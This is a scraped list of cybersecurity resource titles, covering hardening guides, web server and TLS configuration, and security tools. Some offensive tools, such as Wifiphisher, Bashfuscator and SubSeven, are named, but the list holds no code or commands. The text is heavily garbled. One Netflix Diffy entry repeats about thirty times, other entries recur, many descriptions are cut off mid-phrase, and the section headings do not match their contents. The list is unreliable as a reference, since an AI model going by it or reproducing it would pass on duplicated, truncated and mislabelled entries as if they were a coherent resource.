• Secure & Ad-free Internet Anywhere With Streisand and Pi Hole
• Secure Secure Shell
• Securing Docker Containers - practices around deploying Docker containers in production.](https://github.com/docker/docker-bench-security)
• Hardenize
• Set up two-factor authentication for SSH on Fedora
• Zero-knowledge attestation
• Reverie - knowledge proof system.
• bdshemu
• IPv6 Security Best Practices
• Hardened/PaX Quickstart
• 9 Kubernetes Security Best Practices Everyone Must Follow
• Learn and Test DMARC
• VideoLan Robots.txt
• ssh & linux cheat sheets
• CCAT
• RHEL7-CIS - CIS Benchmark Hardening Script
• NSA/CISA Kubernetes Hardening Guidance
• Common approaches to securing Linux servers and what runs on them.
• solo-hw
• Ciderpress
• debian-cis - DSS compliant Debian 7/8 hardening.
• Endlessh
• ERNW Repository of Hardening Guides
• fero - backed signing server
• FirewallChecker - contained firewall checker
• Hardentools
• How To Secure A Linux Server - to guide for securing a Linux server.
• kconfig-hardened-check
• Iptables Essentials
• linux-hardened
• List of sites with two factor auth
• opmsg
• prowler
• reconbf
• Sarlacc
• securityonion-docs
• security-txt
• ssh-auditor
• Streisand
• The Practical Linux Hardening Guide - work in progress.
• tls-what-can-go-wrong - what can go wrong?
• upvote - platform binary whitelisting solution
• CentOS7 Lockdown
• cisecurity
• auditd
• tosh
• CHAPS
• Awesome Windows Domain Hardening
• ssh-audit
• ssh & linux cheat sheets

WebServers

• How to Configure SSL Certificate on Google Cloud Load Balancer?
• Nginx Web Server Security & Hardening Guide
• IBM HTTP Server Security & Hardening Guide
• Apache Tomcat Hardening and Security Guide
• How to Enable TLS 1.3 in Nginx, Cloudflare?
• Apache Web Server Hardening & Security Guide
• List of free rfc3161 servers.
• Apache Security
• A new security header: Feature Policy
• How do I prevent apache from serving the .git directory?
• Nginx C function
• NGINX config for SSL with Let's Encrypt certs
• How to Configure Nginx SSL Certifcate Chain
• It's All About Time - A tool for performing feasibility analyses of timing attacks. [TimingIntrusionTool5000](https://github.com/aj-code/TimingIntrusionTool5000): A tool for performing network timing attacks on plaintext and hashed password authentication.
• Decode.Tools
• IT Security Guidelines for Transport Layer Security (TLS)
• CAA Mandated by CA/Browser Forum
• ENVOY - native applications. [code](https://github.com/envoyproxy/envoy)
• Security/Server Side TLS
• urlscan.io
• QUIC's combined transport- and cryptographic handshake allows it to be 1 Round Trip faster than TCP + TLS and main problems.
• HTTP/2: The Sequel is Always Worse - 21/briefings/schedule/#http2-the-sequel-is-always-worse-22668)
• A File Format to Aid in Security Vulnerability Disclosure
• security.txt
• 20 Essential Things to Know if You’re on Nginx Web Server
• certstream-server
• dotdotslash
• Cheatsheet for finding vulnerable PHP code using grep
• snuffleupagus - Killing bugclasses and virtual-patching the rest!
• FOPO-PHP-Deobfuscator
• TSS - Threshold Secret Sharing - Draft draft-mcgrew-tss-03.txt
• ghp
• LEAR
• NFHTTP
• Secure Headers
• QUIC's combined transport- and cryptographic handshake allows it to be 1 Round Trip faster than TCP + TLS and main problems.

Satellite

• Using a Hardened Container Image for Secure Applications in the Cloud
• Vapor PwnedPasswords Provider
• XPoCe - XPC Snooping utilties for MacOS and iOS (version 2.0)
• WeakNet LINUX 8 - security themed distribution that has been in development since 2010.
• HiTB
• openvotenetwork
• Stratosphere IPS
• Convert nmap Scans into Beautiful HTML Pages
• GeoInt
• Joint Report On Publicly Available Hacking Tools
• Netflix Cloud Security SIRT releases Diffy - [diffy repo](https://github.com/Netflix-Skunkworks/diffy).
• Command-Line Snippets - line commands that make your life easier.
• IP-to-ASN - Team Cymru
• free Entropy Service
• Correct Horse Battery Staple
• Hostintel - [github](https://github.com/keithjjones/hostintel)
• commando packages
• how we uncovered an attack on government entities in Europe
• inlets
• Cloning a MAC address to bypass a captive portal
• Open Steno Project
• Machine Learning on Encrypted Data Without Decrypting It
• Raspberry pi as poor man’s hardware hacking tool
• VoightKampff
• John the Ripper in the cloud
• SpamCop
• Rawsec's CyberSecurity Inventory - cybersecurity-inventory)
• gaijin tools
• CERTrating - tool.html)
• Cybersecurity Maturity Model Certification (CMMC)
• What is the Cybersecurity Maturity Model Certification (CMMC)
• Who needs to have Cybersecurity Maturity Model Certification (CMMC)
• Find Virtual Hosts for Any IP Address
• Security Tools
• Gamifying machine learning for stronger security and AI models
• BashScan
• Ronin
• Netflix Cloud Security SIRT releases Diffy - [diffy repo](https://github.com/Netflix-Skunkworks/diffy).
• Netflix Cloud Security SIRT releases Diffy - [diffy repo](https://github.com/Netflix-Skunkworks/diffy).
• Netflix Cloud Security SIRT releases Diffy - [diffy repo](https://github.com/Netflix-Skunkworks/diffy).
• Netflix Cloud Security SIRT releases Diffy - [diffy repo](https://github.com/Netflix-Skunkworks/diffy).
• Tools by Morphus Labs
• Netflix Cloud Security SIRT releases Diffy - [diffy repo](https://github.com/Netflix-Skunkworks/diffy).
• Netflix Cloud Security SIRT releases Diffy - [diffy repo](https://github.com/Netflix-Skunkworks/diffy).
• Netflix Cloud Security SIRT releases Diffy - [diffy repo](https://github.com/Netflix-Skunkworks/diffy).
• GeoInt
• 0bin
• Gamifying machine learning for stronger security and AI models
• Netflix Cloud Security SIRT releases Diffy - [diffy repo](https://github.com/Netflix-Skunkworks/diffy).
• Netflix Cloud Security SIRT releases Diffy - [diffy repo](https://github.com/Netflix-Skunkworks/diffy).
• Raspberry pi as poor man’s hardware hacking tool
• Netflix Cloud Security SIRT releases Diffy - [diffy repo](https://github.com/Netflix-Skunkworks/diffy).
• Netflix Cloud Security SIRT releases Diffy - [diffy repo](https://github.com/Netflix-Skunkworks/diffy).
• Netflix Cloud Security SIRT releases Diffy - [diffy repo](https://github.com/Netflix-Skunkworks/diffy).
• Netflix Cloud Security SIRT releases Diffy - [diffy repo](https://github.com/Netflix-Skunkworks/diffy).
• Netflix Cloud Security SIRT releases Diffy - [diffy repo](https://github.com/Netflix-Skunkworks/diffy).
• Netflix Cloud Security SIRT releases Diffy - [diffy repo](https://github.com/Netflix-Skunkworks/diffy).
• Netflix Cloud Security SIRT releases Diffy - [diffy repo](https://github.com/Netflix-Skunkworks/diffy).
• Netflix Cloud Security SIRT releases Diffy - [diffy repo](https://github.com/Netflix-Skunkworks/diffy).
• Netflix Cloud Security SIRT releases Diffy - [diffy repo](https://github.com/Netflix-Skunkworks/diffy).
• Netflix Cloud Security SIRT releases Diffy - [diffy repo](https://github.com/Netflix-Skunkworks/diffy).
• Netflix Cloud Security SIRT releases Diffy - [diffy repo](https://github.com/Netflix-Skunkworks/diffy).
• Netflix Cloud Security SIRT releases Diffy - [diffy repo](https://github.com/Netflix-Skunkworks/diffy).
• SubSeven is Back - made version that delivers a retro remote control experience with no loss of functionality and no external dependencies required.
• Netflix Cloud Security SIRT releases Diffy - [diffy repo](https://github.com/Netflix-Skunkworks/diffy).
• Netflix Cloud Security SIRT releases Diffy - [diffy repo](https://github.com/Netflix-Skunkworks/diffy).
• freedomfighting
• Netflix Cloud Security SIRT releases Diffy - [diffy repo](https://github.com/Netflix-Skunkworks/diffy).
• Netflix Cloud Security SIRT releases Diffy - [diffy repo](https://github.com/Netflix-Skunkworks/diffy).
• Introducing Inkdrop 4
• Network Security Monitoring on Raspberry Pi type devices
• A secure, shared workspace for secrets
• bettercap
• Quijote
• Tool Analysis Result Sheet
• EKOLABS
• Is my password pwned? - ridgway.co.uk/blog/pwnedpasswords-sh-a-bash-script-for-searching-troy-hunt-s-pwnedpasswords)
• XPoCe - XPC Snooping utilties for MacOS and iOS (version 2.0)
• Enterprise Password Quality Checking
• DockerAttack
• PyREBox
• find3 - precision indoor positioning framework, version 3
• structured-text-tools
• telnetlogger
• vault
• HiTB
• arphid
• Pybelt
• mhax
• U2F Support Firefox Extension
• git-bug
• mkcert - config tool to make locally trusted development certificates with any names you'd like
• Polymorph - time network packet manipulation framework with support for almost all existing protocols
• query_huawei_wifi_router
• kravatte
• noisy
• PatternAnalyzer
• Google Chromium
• Gammux
• put2win
• Tools by Morphus Labs
• NMapGUI
• python-nubia - line and interactive shell framework.
• nipe
• solo
• Joint Report On Publicly Available Hacking Tools
• APTSimulator
• debugger-netwalker
• USB armory - drive-sized computer](http://inversepath.com/usbarmory)
• Bashfuscator
• Big List of Naughty Strings
• Netflix Cloud Security SIRT releases Diffy - [diffy repo](https://github.com/Netflix-Skunkworks/diffy).
• IP-to-ASN - Team Cymru
• 4nonimizer
• CorrectHorse
• XKCD-password-generator
• freedomfighting
• Machine Learning and Security
• octofairy
• kbd-audio
• certstreamcatcher
• Wifiphisher - Fi security testing.
• chezmoi
• hexyl - line hex viewer.
• howmanypeoplearearound
• LASCAR - Channel Analysis Repository.
• Hostintel - [github](https://github.com/keithjjones/hostintel)
• DarkNet_ChineseTrading
• mXtract
• commando-vm - based security distribution for penetration testing and red teaming.
• Introducing Inkdrop 4
• AntiCheat-Testing-Framework - Cheat on the market. This can be used as Template or Code Base to test any Anti-Cheat and learn along the way. All this code is the result of a research done for Recon2019 (Montreal).
• papers
• Pwnagotchi - Deep Reinforcement Learning vs WiFI
• spyse.py - line client for the tools hosted on spyse.com.
• Open Steno Project
• Raspberry pi as poor man’s hardware hacking tool
• usbkill - forensic kill-switch that waits for a change on your USB ports and then immediately shuts down your computer.
• gs-transfer
• CORE
• VoightKampff
• vector-edk
• H1R0GH057
• gatekeeper - source DDoS protection system
• uriDeep
• Lord Of The Strings (LOTS)
• Unit 42 Public Tools Repo
• glsnip
• What is the Cybersecurity Maturity Model Certification (CMMC)
• Who needs to have Cybersecurity Maturity Model Certification (CMMC)
• ngrok
• cppngrok
• Pybull
• dfss
• python-libnessus - libnessus is a python library to enable devs to chat with nessus XMLRPC API, parse, store and diff scan results. It's wonderful.
• NFIQ2
• Beta
• MaxMind ASN Importer
• Detect It Easy - engine)